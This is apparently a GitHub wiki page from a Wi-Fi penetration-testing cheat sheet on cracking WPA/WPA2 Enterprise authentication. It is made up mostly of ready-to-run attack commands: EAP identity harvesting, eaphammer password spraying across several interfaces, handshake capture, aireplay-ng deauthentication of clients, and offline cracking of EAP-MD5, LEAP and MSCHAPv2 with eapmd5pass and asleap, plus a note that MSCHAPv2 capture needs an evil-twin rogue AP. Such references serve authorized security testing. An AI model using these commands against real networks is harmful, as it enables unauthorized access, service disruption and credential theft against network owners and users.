-
Notifications
You must be signed in to change notification settings - Fork 183
08. WPA WPA2 Enterprise (MGT) Authentication Cracking
Koutto edited this page Nov 1, 2020
·
1 revision
- With Wireshark: look for Identity field in EAP messages of type "Response, Identity"
- With crEAP:
python crEAP.py -i mon0 -c <channel>
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid <target_ESSID> \
--password <password_to_spray> \
--user-list <usernames_list>
--interface-pool
flag is used to provide eaphammer with a list of wireless
interfaces with which to create multithreading.
https://github.com/s0lst1c3/eaphammer/wiki/XIII.-Password-Spraying
EAP-MD5 & MD5 do not use secure tunnel to perform client authentication. Therefore, it is possible to sniff authentication challenge/response and perform offline cracking.
- Capture traffic & write captured handshakes to file:
airdump-ng -c <channel> --bssid <AP_MAC> -w <capture> mon0
- (optional) Deauthenticate client from AP:
aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0
- Crack
eapmd5pass r <capture> -w <wordlist> # For EAP-MD5
asleap -r <capture> -W <wordlist> # For LEAP (crack MSCHAPv2 challenge/response)
asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist> # Challenge/response colon-delimited format
- MSCHAPv2 can be used as "Inner EAP/Authentication Protocol" (inside TLS tunnel) in several EAP methods, such as: EAP-PEAPv0, EAP-TTLS, EAP-FAST.
- Capture of MSCHAPv2 Challenge/Response requires Rogue AP (Evil Twin Attack) + no validation of server's certificate on client (cf. eaphammer).
asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist> # Challenge/response colon-delimited format
- 01. WiFi Basics
- 02. 802.11 Specifications
- 03. WPS (WiFi Protected Setup)
- 04. WPA Protocol Overview
- 05. WPA/WPA2 Personal (PSK) Authentication
- 06. WPA/WPA2 PSK Traffic Decryption
- 07. WPA/WPA2 Enterprise (MGT)
- 08. Evil Twin Attacks
- 09. 802.11 Network Selection Algorithms
- 01. WiFi Interfaces Management
- 02. WiFi Connection
- 03. WiFi Monitoring (Passive Scanning)
- 04. Hotspot Captive Portal Bypass
- 05. WiFi Denial of Service
- 06. WEP Authentication Cracking
- 07. WPA/WPA2 Personal (PSK) Authentication Cracking
- 08. WPA/WPA2 Enterprise (MGT) Authentication Cracking
- 09. WPA/WPA2 Personal (PSK) Traffic Decryption
- 10. Basic AP (Manual Configuration)
- 11. Open Network (no passphrase) Rogue AP / Evil Twin
- 12. WPA/WPA2 Personal (PSK) Rogue AP / Evil Twin
- 13. WPA/WPA2 Enterprise (MGT) Rogue AP / Evil Twin